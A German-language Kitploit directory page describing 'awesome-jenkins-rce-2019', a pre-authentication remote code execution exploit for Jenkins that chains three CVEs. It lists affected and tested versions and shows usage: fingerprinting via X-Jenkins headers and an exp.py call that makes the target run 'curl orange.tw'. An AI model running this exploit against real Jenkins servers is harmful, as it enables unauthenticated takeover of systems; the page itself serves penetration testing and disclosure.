Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
awesome-jenkins-rce-2019 — Seit Mai 2017 gibt es keine Pre-Auth-RCE in Jenkins, aber das hier ist genau eine! | Kitploit
Tools/GitHubGitHub/orangetw/awesome-jenkins-rce-2019
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHuborangetw/awesome-jenkins-rce-2019

awesome-jenkins-rce-2019

Seit Mai 2017 gibt es keine Pre-Auth-RCE in Jenkins, aber das hier ist genau eine!

Repository anzeigen
610127vor 7 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

awesome-jenkins-rce-2019

Es gibt seit Mai 2017 keine Pre-Auth-RCE in Jenkins, aber das hier ist sie!

Es kombiniert CVE-2018-1000861, CVE-2019-1003005 und CVE-2019-1003029 zu einer zuverlässigeren und eleganteren Pre-Auth-Remote-Code-Execution!

Betroffene Liste

  • ANONYMOUS_READ deaktiviert

    • Jenkins-Version < 2.138
  • ANONYMOUS_READ aktiviert (oder mit einem normalen Benutzerkonto)

    • Jenkins-Build-Zeit < 2019-01-28

Verwendung

root@kitploit:~
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000

$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)

Getestet auf

  • Jenkins 2.53
  • Jenkins 2.122
  • Jenkins 2.137
  • Jenkins 2.138 mit ANONYMOUS_READ aktiviert
  • Jenkins 2.152 mit ANONYMOUS_READ aktiviert
  • Jenkins 2.153 mit ANONYMOUS_READ aktiviert
  • Script Security Plugin 1.43
  • Script Security Plugin 1.48

Danksagungen

  • @orange_8361 für CVE-2018-1000861
  • @0ang3el für CVE-2019-1003005
  • @webpentest für CVE-2019-1003029

Einige Folien aus meinem HITB-AMS-2019-Vortrag:

1.png 2.png 3.png

Referenzen

  • Hacking Jenkins Part 1 - Play with Dynamic Routing
  • Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
  • Jenkins Security Advisory 2018-12-05
  • Jenkins Security Advisory 2019-01-28
  • Jenkins Security Advisory 2019-03-06
Tool herunterladen